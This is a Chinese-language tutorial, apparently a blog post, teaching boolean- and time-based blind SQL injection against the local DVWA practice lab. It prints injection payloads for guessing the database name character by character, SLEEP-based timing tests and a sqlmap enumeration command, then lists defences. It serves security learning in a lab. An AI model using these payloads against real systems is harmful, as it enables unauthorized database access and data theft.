SQL 盲注(Blind SQL Injection)

一、🧠 什么是 SQL 盲注?

SQL 盲注(Blind SQL Injection) 是指 页面没有显示明显的报错或数据返回,但仍然可以通过一些技巧 推断出数据库中的信息。

常见的盲注类型有两种:

  • 布尔型盲注(Boolean-based Blind):页面根据条件判断是否显示不同内容。
  • 时间型盲注(Time-based Blind):页面根据条件判断是否延迟响应。

✅ 环境准备

1.拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa

打开浏览器访问:

http://localhost:8080

2.默认登录账号:

  • 用户名:admin
  • 密码:password

3.设置数据库(第一次登录会提示):

点击左侧的 "DVWA Setup "(或顶部菜单),然后点击页面中的 "Create / Reset Database" 按钮。

4.成功后返回 DVWA 首页。

5.在 DVWA 中选择了 SQL Injection (Blind) 模块。

你访问的 URL 结构类似:

php 复制代码
http://localhost/vulnerabilities/sqli_blind/?id=1&Submit=Submit

二、🧪 初级布尔型盲注练习

🎯 目标:判断是否可以控制 SQL 语句
测试 1:恒为真的条件

php 复制代码
1' AND 1=1 -- 

✅ 页面应显示:User ID exists in the database.

测试 2:恒为假的条件

php 复制代码
1' AND 1=2 -- 

❌ 页面应显示:User ID is MISSING from the database.

🔍 如果你能通过页面的不同响应判断 true/false,那说明布尔盲注是可行的。

三、🧪 中级练习:猜数据库名称长度

php 复制代码
1' AND LENGTH(database())=4 -- 

观察页面返回:如果返回 "存在",说明数据库名长度是 4。否则你换成 5、6、3 、去试。

四、🧪 高级练习:逐字符猜数据库名

php 复制代码
1' AND SUBSTRING(database(),1,1)='d' -- 

然后依次替换字符:

php 复制代码
1' AND SUBSTRING(database(),1,1)='a' -- 
1' AND SUBSTRING(database(),1,1)='b' -- 
...

直到页面显示"User ID exists",说明猜对了第一个字符。

继续 SUBSTRING(database(),2,1),即可推完整名。

五、🕓 时间盲注测试(可选)

php 复制代码
1' AND IF(1=1, SLEEP(5), 0) -- 

页面会延迟 5 秒再返回。

php 复制代码
1' AND IF(1=2, SLEEP(5), 0) -- 

页面立即返回(说明条件为假)。

六、❓是否需要自动化工具?

可以使用 sqlmap(测试id参数是否存在布尔型盲注漏洞,如果发现注入点,将尝试列出服务器上的所有数据库):

php 复制代码
sqlmap -u "http://localhost/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
--cookie="security=low; PHPSESSID=你的Session" \
--technique=B --dbs

七、🔐如何防御 SQL 盲注?

  • 使用参数化查询(PreparedStatement)
  • 对用户输入严格过滤、校验类型
  • 最小权限原则,限制数据库账户权限
  • WAF 检测 SQL 注入行为
相关推荐
工具人55551 分钟前
strip()方法可以删除字符串中间空格吗
数据库·mysql
松涛和鸣4 分钟前
35、Linux IPC进阶:信号与System V共享内存
linux·运维·服务器·数据库·算法·list
xinyu_Jina13 分钟前
局域网文件传输:P2P应用层协议——元数据握手与数据通道的生命周期管理
数据库·asp.net·p2p
国科安芯21 分钟前
AS32A601型MCU芯片如何进行IAP升级?
网络·单片机·嵌入式硬件·安全·risc-v·安全性测试
qq 137401861130 分钟前
电商包装的“安全密码”:ISTA 6A标准全解析
功能测试·可用性测试·安全性测试
彬鸿科技30 分钟前
【SDR课堂第42讲】RFSOC开发入门之开发环境搭建(三)
linux·运维·数据库·ubuntu·postgresql·软件无线电·软无
九章-31 分钟前
金仓数据库助力中国石油安全环保技术研究院安全生产智能管控系统全面实现数据库国产化替代
数据库·安全
陌路2032 分钟前
redis 发布订阅功能
数据库·redis·缓存
丁丁丁梦涛33 分钟前
navicat跨服务器连接MySQL数据库
服务器·数据库·mysql
tgethe37 分钟前
mysql-索引详解
数据库·mysql